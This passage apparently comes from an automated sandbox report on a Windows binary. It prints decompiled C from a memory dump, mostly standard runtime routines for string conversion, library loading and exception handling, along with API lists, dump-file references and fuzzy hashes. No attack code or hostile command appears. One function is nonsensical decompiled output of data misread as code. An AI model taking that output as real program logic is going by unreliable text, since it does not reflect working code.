                    								}
                    								goto L12;
                    								L17:
                    								__eflags = _t46;
                    							} while (_t46 != 0);
                    							E01404945(_t56, _t59, _v12);
                    							E014012E1(_t63);
                    							_t66 = _t66 + 0xc;
                    							_t61 = 0;
                    							__eflags = 0;
                    							goto L19;
                    						}
                    						 *((intOrPtr*)(E013FDB3A())) = 0xc;
                    						goto L23;
                    					}
                    					__eflags = _t46;
                    					if(_t46 <= 0) {
                    						goto L24;
                    					}
                    					goto L6;
                    				}
                    				L1:
                    				return  *((intOrPtr*)(E013FDB3A()));
                    			}





























                    0x014143c1
                    0x014143cb
                    0x014143ce
                    0x014143d5
                    0x014143dc
                    0x014143e1
                    0x014143e4
                    0x014143ea
                    0x014143fd
                    0x01414404
                    0x01414407
                    0x01414409
                    0x0141440c
                    0x00000000
                    0x00000000
                    0x01414412
                    0x01414412
                    0x01414414
                    0x01414417
                    0x01414419
                    0x0141441c
                    0x014144fa
                    0x014144fa
                    0x014144fc
                    0x014144b3
                    0x014144bb
                    0x014144c5
                    0x014144c8
                    0x01414549
                    0x01414549
                    0x0141454b
                    0x00000000
                    0x0141454b
                    0x014144ca
                    0x014144cf
                    0x00000000
                    0x014144cf
                    0x014144fe
                    0x01414504
                    0x0141450c
                    0x01414513
                    0x01414516
                    0x01414519
                    0x00000000
                    0x00000000
                    0x01414523
                    0x01414529
                    0x0141452b
                    0x00000000
                    0x00000000
                    0x01414532
                    0x01414538
                    0x01414545
                    0x00000000
                    0x01414545
                    0x01414500
                    0x01414502
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01414502
                    0x01414422
                    0x0141442c
                    0x01414438
                    0x0141443b
                    0x0141443c
                    0x0141443e
                    0x0141445c
                    0x0141445f
                    0x01414462
                    0x01414463
                    0x01414463
                    0x01414465
                    0x01414478
                    0x01414478
                    0x0141447a
                    0x0141447d
                    0x01414482
                    0x01414485
                    0x01414488
                    0x014144d3
                    0x014144d8
                    0x014144db
                    0x014144e2
                    0x014144e2
                    0x014144e8
                    0x014144e8
                    0x014144f0
                    0x014144f6
                    0x00000000
                    0x014144f6
                    0x0141448a
                    0x0141448b
                    0x0141448d
                    0x01414490
                    0x01414492
                    0x01414495
                    0x01414497
                    0x01414471
                    0x01414471
                    0x00000000
                    0x01414471
                    0x01414499
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01414499
                    0x01414467
                    0x00000000
                    0x00000000
                    0x01414469
                    0x0141446f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0141449b
                    0x0141449b
                    0x0141449b
                    0x014144a3
                    0x014144a9
                    0x014144ae
                    0x014144b1
                    0x014144b1
                    0x00000000
                    0x014144b1
                    0x01414445
                    0x00000000
                    0x01414445
                    0x01414424
                    0x01414426
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01414426
                    0x014143ec
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 8bbfb8f7512e503b858e82fa0a4d848c6e57d9fafed7adaad3264f39a46bfe8c
                    • Instruction ID: 395b15c0f07cf018086d05d17c70ce65e75e52d50487f9c3923788dbcac3d961
                    • Opcode Fuzzy Hash: 8bbfb8f7512e503b858e82fa0a4d848c6e57d9fafed7adaad3264f39a46bfe8c
                    • Instruction Fuzzy Hash: FC410871A401166BDB226EFE8C44A6F3AA4EF61374F1C423BF614D72B8D774894242A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E01409CD8(void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* _v40;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t34;
                    				signed int _t40;
                    				int _t46;
                    				int _t53;
                    				void* _t54;
                    				void* _t55;
                    				int _t57;
                    				signed int _t63;
                    				void* _t65;
                    				int _t66;
                    				short* _t67;
                    				signed int _t68;
                    				short* _t69;
                    
                    				_t34 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t34 ^ _t68;
                    				E013FEF21(_t54,  &_v28, _t65, _a4);
                    				_t57 = _a24;
                    				if(_t57 == 0) {
                    					_t53 =  *(_v24 + 8);
                    					_t57 = _t53;
                    					_a24 = _t53;
                    				}
                    				_t66 = 0;
                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                    				_v12 = _t40;
                    				if(_t40 == 0) {
                    					L15:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return E013F268B(_t66, _v8 ^ _t68);
                    				}
                    				_t55 = _t40 + _t40;
                    				_t17 = _t55 + 8; // 0x8
                    				asm("sbb eax, eax");
                    				if((_t17 & _t40) == 0) {
                    					_t67 = 0;
                    					L11:
                    					if(_t67 != 0) {
                    						E013F5890(_t66, _t67, _t66, _t55);
                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
                    						if(_t46 != 0) {
                    							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
                    						}
                    					}
                    					L14:
                    					E013F1B60(_t67);
                    					goto L15;
                    				}
                    				_t20 = _t55 + 8; // 0x8
                    				asm("sbb eax, eax");
                    				_t48 = _t40 & _t20;
                    				_t21 = _t55 + 8; // 0x8
                    				_t63 = _t21;
                    				if((_t40 & _t20) > 0x400) {
                    					asm("sbb eax, eax");
                    					_t67 = E0140131B(_t63, _t48 & _t63);
                    					if(_t67 == 0) {
                    						goto L14;
                    					}
                    					 *_t67 = 0xdddd;
                    					L9:
                    					_t67 =  &(_t67[4]);
                    					goto L11;
                    				}
                    				asm("sbb eax, eax");
                    				E013F2CE0();
                    				_t67 = _t69;
                    				if(_t67 == 0) {
                    					goto L14;
                    				}
                    				 *_t67 = 0xcccc;
                    				goto L9;
                    			}

























                    0x01409ce0
                    0x01409ce7
                    0x01409cf3
                    0x01409cf8
                    0x01409cfd
                    0x01409d02
                    0x01409d05
                    0x01409d07
                    0x01409d07
                    0x01409d0c
                    0x01409d25
                    0x01409d2b
                    0x01409d30
                    0x01409dcf
                    0x01409dd3
                    0x01409dd8
                    0x01409dd8
                    0x01409df4
                    0x01409df4
                    0x01409d36
                    0x01409d39
                    0x01409d3e
                    0x01409d42
                    0x01409d8e
                    0x01409d90
                    0x01409d92
                    0x01409d97
                    0x01409dae
                    0x01409db6
                    0x01409dc6
                    0x01409dc6
                    0x01409db6
                    0x01409dc8
                    0x01409dc9
                    0x00000000
                    0x01409dce
                    0x01409d44
                    0x01409d49
                    0x01409d4b
                    0x01409d4d
                    0x01409d4d
                    0x01409d55
                    0x01409d72
                    0x01409d7c
                    0x01409d81
                    0x00000000
                    0x00000000
                    0x01409d83
                    0x01409d89
                    0x01409d89
                    0x00000000
                    0x01409d89
                    0x01409d59
                    0x01409d5d
                    0x01409d62
                    0x01409d66
                    0x00000000
                    0x00000000
                    0x01409d68
                    0x00000000

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001,00000000,?,00000001,00000000,00000000), ref: 01409D25
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01409DAE
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 01409DC0
                    • __freea.LIBCMT ref: 01409DC9
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                    • String ID:
                    • API String ID: 573072132-0
                    • Opcode ID: 89461c60a69d29eb4544dce71a72f401fc55409cbfb347bf09c178f254170aa5
                    • Instruction ID: acafbf2fe92e84b3287b2225a37af0954d356d1295f60978a72526be5f44ce8b
                    • Opcode Fuzzy Hash: 89461c60a69d29eb4544dce71a72f401fc55409cbfb347bf09c178f254170aa5
                    • Instruction Fuzzy Hash: E931D072A1020AABEF269F69DC44EEF7BA5EF40718B050139ED08D72A1E735D951CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E013F77A4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int __esi) {
                    				signed int _t41;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				void* _t51;
                    				void* _t52;
                    				signed int _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_t54 = __esi;
                    				_t52 = __edi;
                    				_t50 = __edx;
                    				_t49 = __ecx;
                    				_t48 = __ebx;
                    				_t41 = 0x69;
                    				asm("aas");
                    				_t57 = _t56 + __ecx;
                    				asm("insd");
                    				asm("aas");
                    				 *__ecx =  *__ecx + __edx;
                    				if( *__ecx < 0) {
                    					L4:
                    					asm("aas");
                    					_t51 = _t50 + _t55;
                    					if(_t51 >= 0) {
                    						 *((intOrPtr*)(_t41 + _t41 * 8 - 0x3fcdfc8b)) =  *((intOrPtr*)(_t41 + _t41 * 8 - 0x3fcdfc8b)) + _t41;
                    					} else {
                    						asm("o16 aas");
                    						_t41 = _t41 + _t51 + _t48;
                    						_push(0x3f);
                    						 *0x53013f6f =  *0x53013f6f + _t48;
                    						if( *0x53013f6f >= 0) {
                    							_pop(es);
                    						} else {
                    							 *_t49 =  *_t49 + _t52;
                    							asm("o16 aas");
                    							 *((intOrPtr*)(_t49 + 0x6a)) =  *((intOrPtr*)(_t49 + 0x6a)) + _t41;
                    							asm("aas");
                    							 *((intOrPtr*)(_t54 - 0x43fec092)) =  *((intOrPtr*)(_t54 - 0x43fec092)) + _t41;
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(__edi + 0x76)) =  *((intOrPtr*)(__edi + 0x76)) + 0x69;
                    					asm("aas");
                    					 *0x35013f69 =  *0x35013f69 + _t55;
                    					asm("insd");
                    					asm("aas");
                    					 *((intOrPtr*)(__edx + 0x71)) =  *((intOrPtr*)(__edx + 0x71)) + __edi;
                    					asm("aas");
                    					 *0xFFFFFFFF96013FDE =  *((intOrPtr*)(0xffffffff96013fde)) + __esi;
                    					_push(0x6c9d013f);
                    					asm("aas");
                    					_t51 = __edx + _t57;
                    					if(_t51 < 0) {
                    						L7:
                    						asm("aas");
                    						 *((intOrPtr*)(_t51 + 0x65a2013f + _t54 * 2)) =  *((intOrPtr*)(_t51 + 0x65a2013f + _t54 * 2)) + _t52;
                    						goto L8;
                    					} else {
                    						 *__ecx =  *__ecx + __ebx;
                    						if( *__ecx != 0) {
                    							L8:
                    							asm("aas");
                    						} else {
                    							_t54 = __esi + __edi;
                    							asm("a16 aas");
                    							 *_t54 =  *_t54 + 0x69;
                    							asm("insb");
                    							asm("aas");
                    							 *((intOrPtr*)(__ebx + 0x70)) =  *((intOrPtr*)(__ebx + 0x70)) + __ecx;
                    							asm("aas");
                    							 *((intOrPtr*)(__ecx + 0x67013f74)) =  *((intOrPtr*)(__ecx + 0x67013f74)) + 0x69;
                    							asm("a16 aas");
                    							 *((intOrPtr*)(__edi + 0x6b)) =  *((intOrPtr*)(__edi + 0x6b)) + _t55;
                    							asm("aas");
                    							 *((intOrPtr*)(__edi + 0x73ea013f + _t55 * 2)) =  *((intOrPtr*)(__edi + 0x73ea013f + _t55 * 2)) + _t54;
                    							goto L4;
                    						}
                    					}
                    				}
                    			}












                    0x013f77a4
                    0x013f77a4
                    0x013f77a4
                    0x013f77a4
                    0x013f77a4
                    0x013f77a6
                    0x013f77a8
                    0x013f77a9
                    0x013f77ab
                    0x013f77ac
                    0x013f77ad
                    0x013f77af
                    0x013f77f0
                    0x013f77f0
                    0x013f77f1
                    0x013f77f3
                    0x013f7834
                    0x013f77f5
                    0x013f77f7
                    0x013f77f9
                    0x013f77fb
                    0x013f77fd
                    0x013f7803
                    0x013f7844
                    0x013f7805
                    0x013f7805
                    0x013f7807
                    0x013f7809
                    0x013f780c
                    0x013f780d
                    0x00000000
                    0x013f780d
                    0x013f7803
                    0x013f77b1
                    0x013f77b1
                    0x013f77b4
                    0x013f77b5
                    0x013f77bb
                    0x013f77bc
                    0x013f77bd
                    0x013f77c0
                    0x013f77c1
                    0x013f77c7
                    0x013f77cc
                    0x013f77cd
                    0x013f77cf
                    0x013f7810
                    0x013f7810
                    0x013f7811
                    0x00000000
                    0x013f77d1
                    0x013f77d1
                    0x013f77d3
                    0x013f7814
                    0x013f7814
                    0x013f77d5
                    0x013f77d5
                    0x013f77d7
                    0x013f77d9
                    0x013f77db
                    0x013f77dc
                    0x013f77dd
                    0x013f77e0
                    0x013f77e1
                    0x013f77e7
                    0x013f77e9
                    0x013f77ec
                    0x013f77ed
                    0x00000000
                    0x013f77ed
                    0x013f77d3
                    0x013f77cf

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6edc95760123380442b50ecce7b54fb22184533d4d2a96394082662c6ee5bcbc
                    • Instruction ID: 48ea9d65bdca2ac23551708dceb90f4f5002f5fdaeb29cc4c38dcf640d6354ff
                    • Opcode Fuzzy Hash: 6edc95760123380442b50ecce7b54fb22184533d4d2a96394082662c6ee5bcbc
                    • Instruction Fuzzy Hash: DD219671C01727CBC391CF78D4C72D4BBA0FF5126AB05CFAED6445A222E6639813CA82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E01403A83(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				short** _t16;
                    				char* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x143a614; // 0x0
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E014009B2(_t13, _t11, 1);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E014012E1(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0140D7A1();
                    									E014012E1(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}











                    0x01403a83
                    0x01403a86
                    0x01403a8e
                    0x01403a97
                    0x01403aec
                    0x01403aa5
                    0x01403aab
                    0x01403aaf
                    0x01403afd
                    0x01403afd
                    0x01403ab1
                    0x01403ab9
                    0x01403abc
                    0x01403abf
                    0x01403af6
                    0x01403af7
                    0x00000000
                    0x01403ac1
                    0x01403acb
                    0x01403ad7
                    0x00000000
                    0x01403ad9
                    0x01403ad9
                    0x01403ada
                    0x01403adb
                    0x01403ae1
                    0x01403ae6
                    0x01403ae9
                    0x00000000
                    0x01403ae9
                    0x01403ad7
                    0x01403abf
                    0x01403af2
                    0x01403af5
                    0x00000000
                    0x01403af5
                    0x01403af0
                    0x00000000
                    0x01403a90
                    0x01403a94
                    0x01403a94
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0bee0c190c839d87405056e72aae6f10f3674c4e532290e3fa52f22cebc741ca
                    • Instruction ID: 61a14f32321d1da8c443e8d453669ef74f129bedeac29e8b1e151fbc52b2efe1
                    • Opcode Fuzzy Hash: 0bee0c190c839d87405056e72aae6f10f3674c4e532290e3fa52f22cebc741ca
                    • Instruction Fuzzy Hash: 610188F2A052173EF6235DBA6CC5F272E4CEB517B8B30033BB625622F4DA708C414560
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E01406D17(signed int _a4) {
                    				signed int _t9;
                    				void* _t13;
                    				signed int _t15;
                    				WCHAR* _t22;
                    				signed int _t24;
                    				signed int* _t25;
                    				void* _t27;
                    
                    				_t9 = _a4;
                    				_t25 = 0x143a668 + _t9 * 4;
                    				_t24 =  *_t25;
                    				if(_t24 == 0) {
                    					_t22 =  *(0x1423cb0 + _t9 * 4);
                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                    					if(_t27 != 0) {
                    						L8:
                    						 *_t25 = _t27;
                    						if( *_t25 != 0) {
                    							FreeLibrary(_t27);
                    						}
                    						_t13 = _t27;
                    						L11:
                    						return _t13;
                    					}
                    					_t15 = GetLastError();
                    					if(_t15 != 0x57) {
                    						_t27 = 0;
                    					} else {
                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                    						_t27 = _t15;
                    					}
                    					if(_t27 != 0) {
                    						goto L8;
                    					} else {
                    						 *_t25 = _t15 | 0xffffffff;
                    						_t13 = 0;
                    						goto L11;
                    					}
                    				}
                    				_t4 = _t24 + 1; // 0x78d9f93a
                    				asm("sbb eax, eax");
                    				return  ~_t4 & _t24;
                    			}










                    0x01406d1c
                    0x01406d20
                    0x01406d27
                    0x01406d2b
                    0x01406d39
                    0x01406d4f
                    0x01406d53
                    0x01406d7c
                    0x01406d7e
                    0x01406d82
                    0x01406d85
                    0x01406d85
                    0x01406d8b
                    0x01406d8d
                    0x00000000
                    0x01406d8e
                    0x01406d55
                    0x01406d5e
                    0x01406d6d
                    0x01406d60
                    0x01406d63
                    0x01406d69
                    0x01406d69
                    0x01406d71
                    0x00000000
                    0x01406d73
                    0x01406d76
                    0x01406d78
                    0x00000000
                    0x01406d78
                    0x01406d71
                    0x01406d2d
                    0x01406d32
                    0x00000000

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000008,00000000,00000000,?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue), ref: 01406D49
                    • GetLastError.KERNEL32(?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue,0142418C,01424194,00000000,00000364,?,01406AD3), ref: 01406D55
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,01406CBE,00000008,00000000,00000000,00000000,?,01406F9C,00000006,FlsSetValue,0142418C,01424194,00000000), ref: 01406D63
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 91605fc58ab5fc7a2df39e1a8e532cd00ee90defc681f6077688af2ca64e27a9
                    • Instruction ID: 8feb83eb5461e45056f3d56ce56b1824e135ddce6a8f5fd6aa28d7277b3208f0
                    • Opcode Fuzzy Hash: 91605fc58ab5fc7a2df39e1a8e532cd00ee90defc681f6077688af2ca64e27a9
                    • Instruction Fuzzy Hash: 7501D8322522225FC7334E7EAC44D573BA9AF096B07220632F947D32D1D734D45287D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 013F3D1C
                      • Part of subcall function 013F4354: ___AdjustPointer.LIBCMT ref: 013F439E
                    • _UnwindNestedFrames.LIBCMT ref: 013F3D33
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 013F3D45
                    • CallCatchBlock.LIBVCRUNTIME ref: 013F3D69
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: 323bcb5e2340cf0d725e9e72477fcc2e5a5b76c1bc39d279b79a28c4e7bbe541
                    • Instruction ID: 568903727602a12ab617b90ed46ab67455a160ee1a22f578affe29e3d14999b0
                    • Opcode Fuzzy Hash: 323bcb5e2340cf0d725e9e72477fcc2e5a5b76c1bc39d279b79a28c4e7bbe541
                    • Instruction Fuzzy Hash: CB01083200014ABBCF12AF59CC01EDA7FBAFF58758F158519FE1866160D336E8A1DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013EC3A0(void* __ebx, void* __edx, signed char _a4, signed int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v28;
                    				signed char _v32;
                    				void* __esi;
                    				signed int _t83;
                    				signed int _t88;
                    				signed int _t93;
                    				signed char _t98;
                    				signed int _t104;
                    				signed int _t110;
                    				signed int _t117;
                    				signed int _t121;
                    				signed int _t137;
                    				void* _t138;
                    				signed char _t152;
                    				signed char _t156;
                    				void* _t158;
                    				signed int _t160;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t168;
                    				signed int _t169;
                    				signed int _t172;
                    				void* _t173;
                    				signed char _t174;
                    				signed int _t178;
                    				signed char _t179;
                    				signed char _t180;
                    				signed int _t181;
                    				void* _t199;
                    				signed int _t201;
                    				signed int _t204;
                    				signed char _t213;
                    				signed int _t218;
                    				intOrPtr _t222;
                    				signed int _t228;
                    				signed int _t229;
                    				signed int _t234;
                    
                    				_t199 = __edx;
                    				_t173 = __ebx;
                    				_t83 = _a4;
                    				if(_t83 != 0) {
                    					__eflags = _t83 - 0x3ffffff;
                    					if(__eflags > 0) {
                    						E013F3465(__eflags);
                    						goto L10;
                    					} else {
                    						_t169 = _t83 << 6;
                    						__eflags = _t169 - 0x1000;
                    						if(__eflags < 0) {
                    							_t83 = E013F21A5(__eflags, _t169);
                    							_t234 = _t234 + 4;
                    							__eflags = _t83;
                    							if(__eflags != 0) {
                    								goto L1;
                    							} else {
                    								goto L12;
                    							}
                    						} else {
                    							_t2 = _t169 + 0x23; // 0x23
                    							_t177 = _t2;
                    							__eflags = _t2 - _t169;
                    							if(__eflags <= 0) {
                    								L10:
                    								E013F3465(__eflags);
                    								goto L11;
                    							} else {
                    								_t177 = E013F21A5(__eflags, _t177);
                    								_t234 = _t234 + 4;
                    								__eflags = _t177;
                    								if(__eflags == 0) {
                    									L11:
                    									E013FDA71(_t173, _t177, _t199, __eflags);
                    									L12:
                    									E013FDA71(_t173, _t177, _t199, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_t88 = _a4;
                    									__eflags = _t88;
                    									if(_t88 != 0) {
                    										__eflags = _t88 - 0x15555555;
                    										if(__eflags > 0) {
                    											E013F3465(__eflags);
                    											goto L23;
                    										} else {
                    											_t165 = _t88 + _t88 * 2 << 2;
                    											__eflags = _t165 - 0x1000;
                    											if(__eflags < 0) {
                    												_t88 = E013F21A5(__eflags, _t165);
                    												_t234 = _t234 + 4;
                    												__eflags = _t88;
                    												if(__eflags != 0) {
                    													goto L14;
                    												} else {
                    													goto L25;
                    												}
                    											} else {
                    												_t8 = _t165 + 0x23; // 0x23
                    												_t177 = _t8;
                    												__eflags = _t8 - _t165;
                    												if(__eflags <= 0) {
                    													L23:
                    													E013F3465(__eflags);
                    													goto L24;
                    												} else {
                    													_t177 = E013F21A5(__eflags, _t177);
                    													_t234 = _t234 + 4;
                    													__eflags = _t177;
                    													if(__eflags == 0) {
                    														L24:
                    														E013FDA71(_t173, _t177, _t199, __eflags);
                    														L25:
                    														E013FDA71(_t173, _t177, _t199, __eflags);
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														_t93 = _a4;
                    														__eflags = _t93;
                    														if(_t93 != 0) {
                    															__eflags = _t93 - 0xaaaaaaa;
                    															if(__eflags > 0) {
                    																E013F3465(__eflags);
                    																goto L36;
                    															} else {
                    																_t160 = _t93 + _t93 * 2 << 3;
                    																__eflags = _t160 - 0x1000;
                    																if(__eflags < 0) {
                    																	_t93 = E013F21A5(__eflags, _t160);
                    																	_t234 = _t234 + 4;
                    																	__eflags = _t93;
                    																	if(__eflags != 0) {
                    																		goto L27;
                    																	} else {
                    																		goto L38;
                    																	}
                    																} else {
                    																	_t177 = _t160 + 0x23;
                    																	__eflags = _t160 + 0x23 - _t160;
                    																	if(__eflags <= 0) {
                    																		L36:
                    																		E013F3465(__eflags);
                    																		goto L37;
                    																	} else {
                    																		_t177 = E013F21A5(__eflags, _t177);
                    																		_t234 = _t234 + 4;
                    																		__eflags = _t177;
                    																		if(__eflags == 0) {
                    																			L37:
                    																			E013FDA71(_t173, _t177, _t199, __eflags);
                    																			L38:
                    																			E013FDA71(_t173, _t177, _t199, __eflags);
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			asm("int3");
                    																			_t178 = _a8;
